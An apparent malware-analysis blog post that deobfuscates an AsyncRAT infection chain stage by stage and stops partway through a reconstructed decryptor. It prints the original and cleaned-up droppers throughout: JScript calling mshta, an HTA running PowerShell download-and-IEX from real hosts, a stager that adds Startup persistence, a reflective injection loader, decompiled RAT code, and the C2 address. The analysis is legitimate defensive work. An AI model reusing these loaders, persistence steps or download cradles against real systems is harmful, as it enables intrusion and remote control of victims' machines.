Home Malware Analysis About

Unravelling 4 stages of ASyncRat

As I usually do, I was cruising bazaar.abuse.ch and found a JavaScript sample. I quite enjoy the scripting ones because they typically come with a few different stages. So, this post is just going to run through those stages and, spoiler alert, reveal AsyncRAT. I think this is the source: NYAN-x-CAT/AsyncRAT-C-Sharp.

Stage 1

The first stage is is a nice little JavaScript file:

pyylqohe = ("ipt.Shel")
var wzygyoen = WScript.CreateObject("WScr"+pyylqohe+"l")
ujnqrlkb = ("m")
qmsjhapy = ("sh")
zcgptlcr = ("ta ")
wzygyoen.Run((ujnqrlkb+qmsjhapy+zcgptlcr)+" https://t.ly/3HaN",0)

Pretty easy to read, looking at the following:

pyylqohe = ("ipt.Shel")
var wzygyoen = WScript.CreateObject("WScr"+pyylqohe+"l")

It clearly becomes:

var wscriptObject = WScript.CreateObject("WScript.Shell")

And then:

ujnqrlkb = ("m")
qmsjhapy = ("sh")
zcgptlcr = ("ta ")
wscriptObject.Run((ujnqrlkb+qmsjhapy+zcgptlcr)+" https://t.ly/3HaN",0)

Is:

wscriptObject.Run("mshta https://t.ly/3HaN",0)

Passing it into unshorten.it, it gives: https://hopkinsvillereunions.com/JyN.txt

Reaching out to this URL gives more code:

Stage 2

Stage 2 is a HTML Application file:

<HTML>
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -3000,-3000
Dim xlbltz
Set xlbltz = CreateObject("WScript.Shell")
vbrjo = StrReverse(" llehsrewoP")
lfbdx = StrReverse("; )'gpj.9muTbnggcCTPmpDu/semeht/tnetnoc-pw/moc.snoinuerellivsnikpoh//:sptth'(b2a$.3a$ X`E`I = bb$;)1a$ tcejbO-weN( = 3a$;)'gni','&*&*&*&*&*'(ecalpeR.)'sdao','########'(ecalpeR.)'oD','!!!!!!!!!!!'(ecalpeR.'&*&*&*&*&*rt########lnw!!!!!!!!!!!' =b2a$;)'eilC','!@!@!@!@!@!@'(ecalpeR.)'W.te','%$%$%$%$'(ecalpeR.)'etsy','@&@&@&@&@&@&'(ecalpeR.'tn!@!@!@!@!@!@be%$%$%$%$N.m@&@&@&@&@&@&S' = 1a$")
gjlafk = (vbrjo+lfbdx)
xlbltz.Run gjlafk,0
self.close
</script>
<body>
demo
</body>
</HEAD>

This has a few references to StrReverse, so thats easily done:

<HTML>
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -3000,-3000
Dim xlbltz
Set xlbltz = CreateObject("WScript.Shell")
vbrjo = "Powershell"
lfbdx = "$a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg') ;"
gjlafk = (vbrjo+lfbdx)
xlbltz.Run gjlafk,0
self.close
</script>
<body>
demo
</body>
</HEAD>

Renaming variables:

<HTML>
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -3000,-3000
Dim wscript_object
Set wscript_object = CreateObject("WScript.Shell")
powershell_string = "Powershell"
powershell_cmd = "$a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg') ;"
concat_ps_command = (powershell_string+powershell_cmd)
wscript_object.Run concat_ps_command,0
self.close
</script>
<body>
demo
</body>
</HEAD>

Looking at the command, its using junk and .Replace() to obfuscate stuff:

$a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg') ;

Eventually it calls Invoke-Expression, but lets break it down. As its doing a bunch of replaces, it could be an idea to go through and do that. But an easier method is to remove IEX and let it run:

$a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');
$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');
$a3 = (New-Object $a1);
write-host $a3 $a2b

Executing the above gives:

So, overall, its:

System.Net.WebClient Downloadstring('https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg') ;

Grabbing that:

Stage 3

More stagers! This time its finally landing in PowerShell:

Function NJXH
{
[system.io.directory]::CreateDirectory("C:\P"+"r"+"o"+"g"+"ra"+"mDa"+"t"+"a\Micr"+"oso"+"f"+"t A"+"rts"+"\S"+"ta"+"rt\")
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";

$p = 'C:\ProgramData\Microsoft Arts\Start\'
$ps1 = 'C:\Users\Public\'
$ali = 'C:\Users\Public\'

start-sleep -s 5
if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/852340086528147476/firefox.lnk', $p + 'firefox.lnk')){
}

if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/852340062045077534/firefox.bat', $ps1 + 'firefox.bat')){
}

if((New-Object System.Net.WebClient).DownloadFile('https://hopkinsvillereunions.com/wp-content/themes/TutrZFMMnSRNVaOq.jpg' , $ali + 'mgenajogeaub.ps1')){
}
start "C:\ProgramData\Microsoft Arts\Start\firefox.lnk"
}

Tidying it up:

Function NJXH
{
    [system.io.directory]::CreateDirectory("C:\ProgramData\Microsoft Arts\Start\")
    start-sleep -s 5
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
    start-sleep -s 5
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";

    $p = 'C:\ProgramData\Microsoft Arts\Start\'
    $ps1 = 'C:\Users\Public\'
    $ali = 'C:\Users\Public\'

    start-sleep -s 5
    if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/852340086528147476/firefox.lnk', $p + 'firefox.lnk'))
    {

    }

    if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/852340062045077534/firefox.bat', $ps1 + 'firefox.bat'))
    {

    }

    if((New-Object System.Net.WebClient).DownloadFile('https://hopkinsvillereunions.com/wp-content/themes/TutrZFMMnSRNVaOq.jpg' , $ali + 'mgenajogeaub.ps1'))
    {

    }
    start "C:\ProgramData\Microsoft Arts\Start\firefox.lnk"
}

So, some persistence is being done here. The tell being the registry key addition has the Startup flag. Additionally, some lnk files are being downloaded to $p.

Curling https://cdn.discordapp.com/attachments/808540577594736675/852340086528147476/firefox.lnk gives the following response:

<title>Suspected phishing site | Cloudflare</title>

and:

<p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p>

So that's been nuked. As has: https://cdn.discordapp.com/attachments/808540577594736675/852340086528147476/firefox.lnk.

However! The final URL grabs some form of PE: https://hopkinsvillereunions.com/wp-content/themes/TutrZFMMnSRNVaOq.jpg

Stage 4

As this is the final, I dumped it into hybrid-analysis which comes back with a 58/100 threat score and a whole bunch of related data to that domain:

Malicious artifacts seen in the context of the input URL

details
    Found malicious artifacts related to the input domain "https://hopkinsvillereunions.com" (IP: 107.180.91.236): ...

    URL: http://standwithbrenna.org/wp-admin (AV positives: 3/88 scanned on 06/10/2021 13:56:23)
    URL: http://standwithbrenna.org/wp-buzt/adobe-3D6/publish_x (AV positives: 10/88 scanned on 06/10/2021 13:54:33)
    URL: http://standwithbrenna.org/wp-includes (AV positives: 3/88 scanned on 06/10/2021 13:53:05)
    URL: http://standwithbrenna.org/wp-buzt/adobe-3D6/ (AV positives: 12/89 scanned on 06/10/2021 13:09:04)
    URL: http://standwithbrenna.org/wp-buzt/adobe-3D6 (AV positives: 9/88 scanned on 06/10/2021 12:00:06)
    File SHA256: cad36195216fe89f75a7b741bdf2b43bb687dae3ac6652ad99d4b1eafa2ab550 (AV positives: 13/75 scanned on 06/10/2021 10:51:39)
    File SHA256: 51863340741893ed0860f30704e00ee4e4c4f0ac4b2c6eefd5e765008f20eb29 (AV positives: 15/75 scanned on 05/28/2021 05:31:03)
    File SHA256: af0debdfb41a8912e5aaeb55b794656d87b2d15cda0af54c134208119b49d45e (AV positives: 13/74 scanned on 05/24/2021 15:47:15)
    File SHA256: 92b0038e484eb05d8234f51174d3b7ab267a2e1acf769d3ca1c67b7879d56a62 (AV positives: 5/76 scanned on 08/11/2020 18:56:24) 
source
    Network Traffic
relevance
    10/10

I love seeing this kind of obfuscation, I find it so cool. All 0's replaced with bur3o:

I'll just do the replace. Once thats done, another one is revealed:

Stripping those HUGE blobs out leaves the following:

FUNCTION Work($WorkE)
{
  $Workx = "F"+"r"+"o"+"m"+"B"+"a"+"s"+"e"+"6"+"4"+"S"+"t"+"r"+"i"+"n"+"g"
  $WorkG = [Text.Encoding]::Utf8.GetString([Convert]::$Workx($WorkE))
  return $WorkG
}

Function HBar {
 
    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$H3
    )
    $H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2)
    for ($i = 0; $i -lt $H3.Length; $i += 2) {
        $H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16)
    }

    return [byte[]]$H2
}
[String]$H4 = ''

[Byte[]]$H5=HBar $H4
[String]$Server = ''
[Byte[]]$H1=HBar $Server
$JUANADEARCO = 'W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRINSkuR2V0VHlwZSgnVkJORVQuUEUnKS5HZXRNZXRob2QoJ1J1bicpLkludm9rZSgkbnVsbCxbb2JqZWN0W11dICggJ0M6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxhc3BuZXRfY29tcGlsZXIuZXhlJywkSDEpKQ=='
$REYKI = Work($JUANADEARCO);$Run=($REYKI -Join '')|I`E`X

Making this more readable:

FUNCTION Base64Decode($input)
{
  return [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($input))
}

Function ConvertToHex {
 
    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$H3
    )
    $H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2)
    for ($i = 0; $i -lt $H3.Length; $i += 2)
    {
        $H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16)
    }
    return [byte[]]$H2
}

[Byte[]]$H5=ConvertToHex $H4
[Byte[]]$H1=ConvertToHex $Server
$JUANADEARCO = [Reflection.Assembly]::Load($H5).GetType('VBNET.PE').GetMethod('Run').Invoke($null,[object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$H1))
$REYKI = Base64Decode($JUANADEARCO);
$Run=($REYKI -Join '')|IEX

HBar() appears to be converting to hex, and Work() is a wrapper for Base64. To actually get the payload, I'll do this:

FUNCTION Base64Decode($input)
{
  return [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($input))
}

Function ConvertToHex {
 
    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$H3
    )
    $H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2)
    for ($i = 0; $i -lt $H3.Length; $i += 2)
    {
        $H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16)
    }
    return [byte[]]$H2
}

[String]$H4 = Get-Content "stage4-h4.dat"
[String]$Server = Get-Content "stage4-server.dat"

[Byte[]]$H5=ConvertToHex $H4
[Byte[]]$H1=ConvertToHex $Server
Write-Host $H5
Write-Host $H1

For the sake of not killing Sublime Text, they are just in .dat files and read in with Get-Content:

The $H5 variable:

CyberChefing from decimal:

Exporting and looking at the file, it reveals it to be VBNET.dll:

Looking at this in PEStudio, its very likely to do some PPID Spoof and Injection:

I will come back to that later. And now for $H1:

"Stub", Lol. Throwing it into PEStudio:

This one has a lot more going on. It has base64, anti-debugging, and all sorts.

Stage 5

Re-cap, at this point, there are two binaries:

SHA256 File Format Name
91E89B9C89BEE655B18D596E4AEC6BD3D44658A2EA7CB90A97A018DA9E6DB858 DLL VBNET.dll
22B5BF913635BC456D04899B2AC3E26669C6FC450E2A0EB01A695A9F717BCC85 Exe Stub.exe

Exe

The Exe had a lot of stuff I want to poke at, specifically the base64 strings. But first, hybrid-analysis gives this a 70/100 threat score and shows that the PE sends data over IRC:

Sends network traffic on a port typically used by IRC

details
    "IRC traffic to 77.247.127.9 on port 6666 
source
    Network Traffic
relevance
    6/10
ATT&CK ID
    T1043 (Show technique in the MITRE ATT&CK™ matrix)

Thats found the C2, but lets dig into it further. Back to the base64, unfortunately they're a bit too long to dump here and when they're decoded they don't reveal too much. Moving on.

Because of the CLR DLLs being imported, its safe to assume this will be decompiled with DotPeek:

Right off the bat its trying to be clever:

public static void Main()
{
  for (int index = 0; index < Convert.ToInt32(Settings.Delay); ++index)
    Thread.Sleep(1000);
  if (!Settings.InitializeSettings())
    Environment.Exit(0);
  try
  {
    if (!MutexControl.CreateMutex())
      Environment.Exit(0);
    if (Convert.ToBoolean(Settings.Anti))
      Anti_Analysis.RunAntiAnalysis();
    if (Convert.ToBoolean(Settings.Install))
      NormalStartup.Install();
    if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin())
      ProcessCritical.Set();
    Methods.PreventSleep();
  }
  catch
  {
  }
  while (true)
  {
    try
    {
      if (!ClientSocket.IsConnected)
      {
        ClientSocket.Reconnect();
        ClientSocket.InitializeClient();
      }
    }
    catch
    {
    }
    Thread.Sleep(5000);
  }

Execution Delay:

for (int index = 0; index < Convert.ToInt32(Settings.Delay); ++index)
Thread.Sleep(1000);

Where Setting.Delay is:

public static string Delay = "3";

The next line then checks if it was able to initialise, which Settings.InitializeSettings() shows:

public static bool InitializeSettings()
{
  try
  {
    Settings.Key = Encoding.UTF8.GetString(Convert.FromBase64String(Settings.Key));
    Settings.aes256 = new Aes256(Settings.Key);
    Settings.Ports = Settings.aes256.Decrypt(Settings.Ports);
    Settings.Hosts = Settings.aes256.Decrypt(Settings.Hosts);
    Settings.Version = Settings.aes256.Decrypt(Settings.Version);
    Settings.Install = Settings.aes256.Decrypt(Settings.Install);
    Settings.MTX = Settings.aes256.Decrypt(Settings.MTX);
    Settings.Pastebin = Settings.aes256.Decrypt(Settings.Pastebin);
    Settings.Anti = Settings.aes256.Decrypt(Settings.Anti);
    Settings.BDOS = Settings.aes256.Decrypt(Settings.BDOS);
    Settings.Group = Settings.aes256.Decrypt(Settings.Group);
    Settings.Hwid = HwidGen.HWID();
    Settings.Serversignature = Settings.aes256.Decrypt(Settings.Serversignature);
    Settings.ServerCertificate = new X509Certificate2(Convert.FromBase64String(Settings.aes256.Decrypt(Settings.Certificate)));
    return Settings.VerifyHash();
  }
  catch
  {
    return false;
  }
}

If everything decrypts and works fine, then its good to go. Next, it creates a Mutex to instance itself:

if (!MutexControl.CreateMutex())
    Environment.Exit(0);

After that anti-debugging:

if (Convert.ToBoolean(Settings.Anti))
  Anti_Analysis.RunAntiAnalysis();

The RunAntiAnalysis class:

  internal class Anti_Analysis
  {
    public static void RunAntiAnalysis()
    {
      if (!Anti_Analysis.DetectManufacturer() && !Anti_Analysis.DetectDebugger() && (!Anti_Analysis.DetectSandboxie() && !Anti_Analysis.IsSmallDisk()) && !Anti_Analysis.IsXP())
        return;
      Environment.FailFast((string) null);
    }

    private static bool IsSmallDisk()
    {
      try
      {
        long num = 61000000000;
        if (new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize <= num)
          return true;
      }
      catch
      {
      }
      return false;
    }

Not too fussed about this at the moment. Once thats done it then installs persistence and makes some changes to the sleep config:

if (Convert.ToBoolean(Settings.Install))
  NormalStartup.Install();
if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin())
  ProcessCritical.Set();
Methods.PreventSleep();

Finally, connect:

  while (true)
  {
    try
    {
      if (!ClientSocket.IsConnected)
      {
        ClientSocket.Reconnect();
        ClientSocket.InitializeClient();
      }
    }
    catch
    {
    }
    Thread.Sleep(5000);
  }

The settings:

public static string Ports = "t2nKOzYj0cOv2qg0u7nSEzre18jIRtMkff+A1fJwmx9S2cNE4bS0isw35a+elH8vvEeq9rxQQr8ctp7SXAHv+g==";
public static string Hosts = "l1VDtNQHYKw7oyejimwLEz6zOLp1GHm1MdlVlcglHPTNq6anPKeOUkfpT/uMgKB+uioOQOcc9kSHroapCjYk9g==";
public static string Version = "24o55NfpOilJhXezbajaIIb7jIZcr0rs/SWgCkY3w2BpRI/dWG+4pbVfe8DcM0IDLonhFKodRBDiDa7PvXUocg==";
public static string Install = "fLeN4+ZnNpHyL2eJbS7qkLdXAUi7wgp7SAVvuTwoPFLJyCgnmbhGYImfzVCDWdQ2bj3EtNFOyUK8rlPbb0L7Xg==";
public static string InstallFolder = "%AppData%";
public static string InstallFile = "";
public static string Key = "RFo5TjhDZjBwMHRLOWpuSHZqdkI5Wm5DcWJMVmE0RHQ=";
public static string MTX = "b7qHN0k+Zdo1gIrDiUYyNSkb7tmNLp2Uoc3ePKH2RSO5qM74MOlyATBPU66ctkvwLGfAL76/CIAY3H5WLw1bZiqAbzogm+cj+kEXLR4OwQI=";
public static string Certificate = "iOQNQBKMXsphx92O1b8x4DCs+G57EzQycjlZBmwbcBZbMay0CI/ycktGlobQeCqCB3kPZ5j2Hb8ug3ngiXoy9LSG4eadMYsTamkAVAVJelLOVv+CZ2n75EfjoJ+o8g6sMJXY/HTgydRHD458y4ZwjhA/fTB154SYlYIIu4aFcCvF3CnwJK5Yk7ZwAplg+xHbuDyMdph4Q+amx4ZkGHOPA78RIFn3XR8tOvqg+rzsn0Hxw2WY/ohVyAHXhR5pkqOZvJPJGnvqs9BuhIHQm+KswODwt8Y+HtgBgIVcpqehAH/rpvmq3YCuqF7cPNrZ3QaJsNbiah7veQCGUpN1rXlikNXYutwzBu8mI0kjxeE+HksC/HN/d7xGMWuPpNrgYqB5hLZsYuMmZl85izdlbKEge/BaFuhFpUbu6zb1g4L0o1NbQqeUCwX+HVldgWd4JeivQGmIFZsmS9PA3in+uGg2c6AhS0K1G9/s8hGskvWfDnPFz5tcSdMX+X0zbjx8dIPNjeShvQ4X1vxV/7yeqAKj0nMba3HTvE9GX6kfItC9cX8TNZQ5DcnkifJsigVZvaxV2Ig4i7WR002jOa+O8/wEp2tknOev98nSWq591E3SzpWVFbYNKfM1cG0DSNGEitqPYsnh4TNcWZ3SLJ2ZASlMJdlX4XCu8l+nIDq0DNaaFhs/1aEUQlRoyhSGGauoX0/qhX6XtaBooBJgR8chB23XXXkH4dt8pFgvXvumz9MDkmlL/Xb4rWNbXpxhntSv8Qi8SQSb7trNXjfVAQ0kmHy5AGnwjtAqoRE2kC7OXxW9mLtMevPCB/oS52llak258i0WALE8m4HhM+TTlm5YYeF3/+Rf55YSNdINh6i70M8TdH0lXG9Na66Kxa3M61mzuSjXXOpRJnBt5VGtdSzfd3WsZ3M8nmoxR1HJnV5Iw8LOk0TkpkhHBYUtvTnyInLyyFWTIrFBf6iU9UJNjArRM0ZedRw42JNubZUMMw1pgRoeBQ2y+MEGwV9Gy2D2kJmT3ks4CHjsMqNdX1VIXKbA25+KVH0gM5zhl4YkNkzu4F0Ge46xYSzwxWlp/0NQY/OXd8y7oAQpmMwAO3NCYpbSyxktk0w4CUUt7SIhWIEueb4ScEm7s+3fQCrwFMAxDpB6pKrtMpFfKG9Ef6ilygjIeOPD3BxdOgp+BJ90GjfFlHpAw0pLQe5SQdcqs0iACGNfeVoLpAZe4gQBkJACwwgeBxp4vHurcnWUOFAnjM7cJj2QKJ/ljfQNDb21ndY6R7IvuFskZRaSa1HqefwLphpL4a77sgqgzSma1jEdq9ofeZ83sPfgUcOFsVrwXc6J77Rh9tY+FqbBdsUH8wBZpp4VMZxinuZfaOERVNfyNuinD6tqbTlRSt65P0FrhN80rsiBteUwq65j43G8fg5K9+fobj215grYfLjn7GuSLDS85uVW+3LgMe+BrF9UclJpELpvzHd1qoskWcj5qGaaOEz2OIO39q1rw9G4rpC8anW/Y75EXid9F1tctHUBPTxcjJTVWT/sEB+j5CTNvxIgynHLyxmQOAug/3D0gNPQEb5fGXapZSIGOBxpPsPX/mZBMsMFwBjaJkIZv2FslMBWPYetq+yKY/4RfGZiHMQ4U518M+lqA10njpcNlcN8nwDWi1q/cxkhvIouXIH0Lo8RiQf2+lIZSYI1SZvDq/VfmP4GDZJoDt1FMvPafkk6WpXRh9C4l8AKD+X2z6X3xygD15BEDa6PCu3+1MxrxP0DnKsWjOPKWDcmi5M7s9pUnutTG9MW2v5aCjf6/cAOTN6OqsoxVATGsShtp5SNhzF5s2cgBZ5Y5mgblLr+TAnDQaTqPdBls35Z1FEfTLq3i+sPvJ5d6qSUqjIgwY06sEgPxRKgcX/bQZGZA1sETm32aYsK5SMmqTni6zycR8MIa6S+2h5ZZXZgOlWiA5yau2QF9+l21jnpxxVJS5owrav/ytaW6oUFK0hVI7jgLQcDjDJ/WHEnbbdwQ5jfF0jsT0IE9l03zLhOuSssC0mVTZhvLw7dtvAp3j8IH+KUWChmt6XJJZchT1tCz2QBJ4vD0svNGNo7d24E3xFM7qgYZ9VhdjX6HoRVTcf4fUql5eL4/KgNE7KSMCarR8HqXTuNq57WO0YJqYIKHsS/lEKpbZ8b02tFMR3Is1xwpGoHnWHXqGdlNbEzBFdjqeZ79O6+u+aDjsXZNNzlYXl+UQiTQwsYmKB9J8ttrseiVBA70LO8N7A2ERBUHYi/5kAxMWycupPMjmFtltDohk8pD9ZDHjOmI8LrmfAG5T5HBDZecYRMLhZQFDEfrxKPmSi29zkRLWsdAfX2Pxi/aAk=";
public static string Serversignature = "I++EqoTbWaQ18dZ+DbXDG2Zq+S7/Fu0BsIDqeIGAYon7F+GNRWIVN+gZDsKGUhk4Y9oQ+aHr68H78iR99ZoBOm4zsqqjpSpke3heysvXPHdCTVnhMoXiT95qK0yHWkhEAssPXcQlJ3E0BAmDdj83Xzi+Xk6I+9hbgkz1jch8QR3mjJqqUVgjAkh9ymZuluih+epFScM+uf0MpBBAHre4bQkNts+6w9ubf6g2VD0e5Ipt0+VzRhspNhpdr14Eg81vd0wEj6oFYm1UxiPSJjWeF6D8+DEGSxNjmuLr8ODj1jbYMVXZ0598kDXxcZ/fqGuHrkC1EaXH0SybcumLqqwqZ4MBpQCsC7xCCFU689RJqTlt9NJnhwy0fps+28N4UTEl00FHOXYMBnmHsG111jWsIZXmke8t0bJCDRltq1o0nCKf2lUI07/yiS1OVUtaeBepWK+BZxk2ggbkJvjfFhVJZboxFb9h8yK5s+4fE1DvqHcxgTixpk7CEx4/RlTrd0Ol1mCOkNLpH6oe67UC8KqX7ZLUgT/YIH4lU/h3askcEJzXWQ4YFf1xiQD6tcy1QCF9RBHJfQO3umwx0RzvKEP07o6FtPhmkOYyx9PLnFLAhYD4BuAlhyf9dkKANXUZdNokRBn7fOD5CXtxHQqhaVnVK024LnrDlxFE7HbxMSlDfF1BbM6wmVNE3NUcFvHuTwl5kyMf8S0xRYGd04EiiPMuj7ZlwAsphOUj7GonsHGJVOVNSzmEraTZEWtAKV/89ooDPLGt2+/SqOcFS4bofxEYwx3WLI8nQPy0C+AuD5J37/ZnuO4GogZcPJ0AR6CAn0KFsCKsSgJ0pgICQ19MOpk7XU23DDo6OOQPGLK9pMZHdjp04GSCmZm8XIYnaXzODX33UtgfVy03c+91EknkxMPQqpHPx8PZzJvwbFpvbjhUvemCpr4uxYiWznVDkb3XjxGUf2ZBmY07p9qmO+/xooD4rw==";
public static X509Certificate2 ServerCertificate;
public static string Anti = "I9XbE9Y40w3b9h/252aXK3u3bOO9/cfbF48D4PqX1Nhx1lX3sAjOHSlPXNaUnA34kvPmCwiYwpKt2ButV3QDJA==";
public static Aes256 aes256;
public static string Pastebin = "H1jGb2NK/kGDPUld1Reh0VhfkUT1avpNoDOqgvb7luGqHBGAkWB+XsvBXESc5MCgrtFY7KXEB77kZ6jjFAQNJw==";
public static string BDOS = "KBfTz24fL86ElK7C9Yl6ZE7mMLjov+CGSf7lapyRcxsTe2U9ODSTyXV0oxaYpKMxic5MiANIX2KW1MggpPYZuQ==";
public static string Hwid = (string) null;
public static string Delay = "3";
public static string Group = "BDlmfJugzGq/Zshig+2ddnPtiMlHrM+OU7R4dJA1AHRRxVlTetFcwfD+oRsMM4JrDXDX/FrDKFh4Vtno15urKQ==";

Conveniently, these are all the base64 strings from earlier and now its confirmed to be AES by the initialisation section:

Settings.Key = Encoding.UTF8.GetString(Convert.FromBase64String(Settings.Key));
Settings.aes256 = new Aes256(Settings.Key);
Settings.Ports = Settings.aes256.Decrypt(Settings.Ports);
Settings.Hosts = Settings.aes256.Decrypt(Settings.Hosts);
Settings.Version = Settings.aes256.Decrypt(Settings.Version);
Settings.Install = Settings.aes256.Decrypt(Settings.Install);
Settings.MTX = Settings.aes256.Decrypt(Settings.MTX);
Settings.Pastebin = Settings.aes256.Decrypt(Settings.Pastebin);
Settings.Anti = Settings.aes256.Decrypt(Settings.Anti);
Settings.BDOS = Settings.aes256.Decrypt(Settings.BDOS);
Settings.Group = Settings.aes256.Decrypt(Settings.Group);
Settings.Hwid = HwidGen.HWID();
Settings.Serversignature = Settings.aes256.Decrypt(Settings.Serversignature);
Settings.ServerCertificate = new X509Certificate2(Convert.FromBase64String(Settings.aes256.Decrypt(Settings.Certificate)));
return Settings.VerifyHash();

Because .NET is easy I just pulled out all the decryption code and reassembled it locally:

The code:

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading.Tasks;

namespace Decrypter
{
    public static class HwidGen
    {
        public static string HWID()
        {
            try
            {
                return HwidGen.GetHash(Environment.ProcessorCount.ToString() + Environment.UserName + Environment.MachineName + (object)Environment.OSVersion + (object)new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize);
            }
            catch
            {
                return "Err HWID";
            }
        }

        public static string GetHash(string strToHash)
        {
            byte[] hash = new MD5CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(strToHash));
            StringBuilder stringBuilder = new StringBuilder();
            foreach (byte num in hash)
                stringBuilder.Append(num.ToString("x2"));
            return stringBuilder.ToString().Substring(0, 20).ToUpper();
        }
    }
    public class Aes256
    {
        private const int KeyLength = 32;
        private const int AuthKeyLength = 64;
        private const int IvLength = 16;
        private const int HmacSha256Length = 32;
        private readonly byte[] _key;
        private readonly byte[] _authKey;
        private static readonly byte[] Salt = new byte[32]
        {
      (byte) 191,
      (byte) 235,
      (byte) 30,
      (byte) 86,
      (byte) 251,
      (byte) 205,
      (byte) 151,
      (byte) 59,
      (byte) 178,
      (byte) 25,
      (byte) 2,
      (byte) 36,
      (byte) 48,
      (byte) 165,
      (byte) 120,
      (byte) 67,
      (byte) 0,
      (byte) 61,
      (byte) 86,
      (byte) 68,
      (byte) 210,
      (byte) 30,
      (byte) 98,
      (byte) 185,
      (byte) 212,
      (byte) 241,
      (byte) 128,
      (byte) 231,
      (byte) 230,
      (byte) 195,
      (byte) 57,
      (byte) 65
        };

        public Aes256(string masterKey)
        {
            if (string.IsNullOrEmpty(masterKey))
                throw new ArgumentException("masterKey can not be null or empty.");
            using (Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(masterKey, Aes256.Salt, 50000))
            {
                this._key = rfc2898DeriveBytes.GetBytes(32);
                this._authKey = rfc2898DeriveBytes.GetBytes(64);
            }
        }

        public string Encrypt(string input) => Convert.ToBase64String(this.Encrypt(Encoding.UTF8.GetBytes(input)));

        public byte[] Encrypt(byte[] input)
        {
            if (input == null)
                throw new ArgumentNullException("input can not be null.");
            using (MemoryStream memoryStream = new MemoryStream())
            {
                memoryStream.Position = 32L;
                using (AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider())
